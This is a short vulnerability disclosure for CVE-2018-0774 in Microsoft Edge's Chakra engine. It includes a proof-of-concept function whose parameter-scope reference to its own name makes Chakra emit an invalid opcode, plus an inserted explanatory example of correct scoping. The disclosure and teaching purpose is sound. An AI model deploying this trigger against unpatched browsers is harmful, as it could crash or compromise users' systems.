Microsoft Edge Chakra suffers from an incorrect scope handling vulnerability.
Microsoft Edge: Chakra: Incorrect scope handling
CVE-2018-0774
PoC:
(function func(arg = function () {
    print(func); // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
    print(func);
    function func() {
    }
})();
Chakra fails to distinguish whether the function is referenced in the param scope and ends up emitting an invalid opcode.
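The scoping the PoC depends on, written out as an added example that is not part of the original report: a conforming engine (for instance Node.js) gives the parameter scope its own view of the name func, separate from the body-level declaration. The helper names paramScopeVsBodyScope and withoutBodyDeclaration are mine.

```javascript
// Added example, not from the original report. A function with a non-simple
// parameter list (a default initializer) gets a separate parameter scope.
// A closure created in that scope that references the function's own name
// must resolve it to the outer named function expression; a
// `function func() {}` declaration in the body creates a new body-scope
// binding that shadows the name only inside the body.
function paramScopeVsBodyScope() {
  let seenInParamScope;
  let seenInBody;
  const outer = (function func(arg = function () {
    seenInParamScope = func; // resolved in the parameter scope
  }()) {
    seenInBody = func; // resolved to the hoisted body-level declaration
    function func() {}
  });
  outer();
  return {
    paramRefersToOuter: seenInParamScope === outer,
    bodyRefersToOuter: seenInBody === outer,
    bodyIsDeclaration: typeof seenInBody === 'function' && seenInBody !== outer,
  };
}

// Control case: without the shadowing declaration in the body, both
// references resolve to the same outer function object.
function withoutBodyDeclaration() {
  let seenInParamScope;
  let seenInBody;
  const outer = (function func(arg = function () {
    seenInParamScope = func;
  }()) {
    seenInBody = func;
  });
  outer();
  return {
    paramRefersToOuter: seenInParamScope === outer,
    bodyRefersToOuter: seenInBody === outer,
  };
}
```

The first helper mirrors the PoC's shape, so an engine that resolves both references to the same binding (or emits bad bytecode for the param-scope reference, as the report describes for Chakra) fails these expectations.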
This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.
Found by: lokihardt